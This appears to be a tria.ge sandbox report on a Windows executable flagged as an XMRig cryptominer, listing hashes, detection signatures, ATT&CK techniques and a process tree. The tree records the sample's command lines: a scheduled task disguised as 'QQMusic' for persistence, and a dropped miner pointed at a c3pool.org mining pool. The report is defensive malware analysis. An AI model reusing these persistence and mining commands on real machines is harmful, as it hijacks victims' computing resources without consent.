Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
14/06/2024, 11:48
General
-
Target
1172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8.exe
-
Size
9.0MB
-
MD5
6b4f06f6c6c73a1d56c5a66be8306541
-
SHA1
2af7e6175abe6f102520b61a92e03990c80cc2f4
-
SHA256
1172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8
-
SHA512
fda4c6bde698c62c66f6e8023f1cdd84b7fca99c19f8c02882045d19ba983e7a9a0223f6ffbebbe2d8ffb363b02f437f550413cb16bdff110d4da3e09e0b0ed2
-
SSDEEP
196608:rhHMBGC3PtXtT+Was8+wq1wo9JoYx5JAMdJOnZTG1IvQSaKe6NZOn:r2G0vwuwasMdJOnZKVSaaNZOn
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 18 IoCs
-
Executes dropped EXE 19 IoCs
-
UPX packed file 21 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 9 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 48 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8.exe"C:\Users\Admin\AppData\Local\Temp\1172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8.exe"1⤵
- Adds Run key to start application
- Enumerates connected drives
- Checks for VirtualBox DLLs, possible anti-VM trick
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\1172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8.exe /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\1172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8.exe /F3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\SMB.exeC:\ProgramData\SMB.exe2⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c ipconfig /flushdns2⤵
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im sBnopqr.exe&&exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sBnopqr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\sBnopqr.exeC:\ProgramData\sBnopqr.exe -o stratum+tcp://auto.c3pool.org:19999 -u 4 -p R --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\1172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8.exeC:\Users\Admin\AppData\Local\Temp\1172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8.exe1⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.1MB
MD57b2f170698522cd844e0423252ad36c1
SHA1303ac0aaf0e9f48d4943e57d1ee6c757f2dd48c5
SHA2565214f356f2e8640230e93a95633cd73945c38027b23e76bb5e617c71949f8994
SHA5127155477e6988a16f6d12a0800ab72b9b9b64b97a509324ac0669cec2a4b82cd81b3481ae2c2d1ce65e73b017cebb56628d949d6195aac8f6ddd9625a80789dfa
-
Filesize
85KB
MD558afd36c7a90dc7707dbadce07fd9754
SHA1c3860a05100bc586e9f068dd119f19cac7d89741
SHA25669b007ba2c100a10f71498d6bceae977e8f2803cb94b7139c9cfcd693c30a2b8
SHA5125b4422cad8f059edc3ce87436a612e92302bc83249207e26bbca8c3e18631d28cb97fad5ff409f8df7b918273ab829666040f1b16c00da48a6a6bd488a25e352
-
Filesize
1.3MB
MD523d84a7ed2e8e76d0a13197b74913654
SHA123d04ba674bafbad225243dc81ce7eccd744a35a
SHA256ac530d542a755ecce6a656ea6309717ec222c34d7e34c61792f3b350a8a29301
SHA512aa6b0100d477214d550b6498787190fc1a8fafa7c478f9595d45e4e76ece9888b84dcca26696500d5710a9d1acae4810f2606d8962c46d31f2bdfcdd27bd675c
-
Filesize
9.0MB
MD56b4f06f6c6c73a1d56c5a66be8306541
SHA12af7e6175abe6f102520b61a92e03990c80cc2f4
SHA2561172a8b8cb6975d716b1f133462c2a8506e17f142c95ca220f4ffe066229f2a8
SHA512fda4c6bde698c62c66f6e8023f1cdd84b7fca99c19f8c02882045d19ba983e7a9a0223f6ffbebbe2d8ffb363b02f437f550413cb16bdff110d4da3e09e0b0ed2
-
Filesize
6.3MB
-
Filesize
80KB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB
-
Filesize
6.3MB